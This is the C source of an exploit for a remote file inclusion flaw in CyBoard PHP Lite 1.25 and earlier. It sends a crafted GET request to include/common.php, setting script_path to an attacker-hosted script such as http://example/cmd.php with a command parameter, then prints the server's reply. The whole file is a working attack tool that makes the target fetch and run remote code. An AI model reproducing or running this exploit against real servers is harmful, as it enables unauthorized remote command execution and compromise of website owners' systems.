/* CyBoard PHP Lite <= 1.25 (common.php) Remote File Include      */
/* Bug found by SpC-x.                */
/*                    */
/* $ gcc -o f_cbl f_cbl-1.25.c              */
/* $ ./f_cbl <remote_addr> <remote_path> <cracker_cmd>        */
/*       192.168.0.1 /[cyboard_path]/
http://example/cmd.php?&cmd=[command] */
/*                    */
/* Federico Fazzi <federico@autistici.org>           */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <netdb.h>

#define PORT (80)

int main(int argc, char *argv[]) {

    int sock;
    char *request;
    char response[256];
    struct sockaddr_in saddr;
    struct hostent *saddrhost;

    if ( argc < 3 ) {
  printf("%s <remote_addr> <remote_path> <cracker_cmd>\n", argv[0]);
exit(-1);
    }

    request = (char *) malloc(1024);
    // copy into the memory the string GET[..]
    snprintf(request, 256, "GET
%sinclude/common.php?script_path=%s\r\n", argv[2], argv[3]);

    // init the listener
    if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
  perror("Socket");
        exit(-1);
    }
    else {
  // init and set all struct types
  bzero((char *)&saddr, sizeof(saddr));
  saddrhost = gethostbyname(argv[1]);
  bcopy(saddrhost->h_addr,&saddr.sin_addr,saddrhost->h_length);
  saddr.sin_family = AF_INET;
  saddr.sin_port = htons(PORT);

  // get connection with the webserv
  if (connect(sock, (struct sockaddr*)&saddr, sizeof(saddr)) == -1) {
      perror("Socket");
  }
  // send string to the webserv
  send(sock, request, strlen(request)+1, 0);  
  // get the answer data from webserv
  while (recv(sock, response, sizeof(response), 0)) {
      puts(response);
  }
    }
    free(request);
    close(sock);
    return 0;
}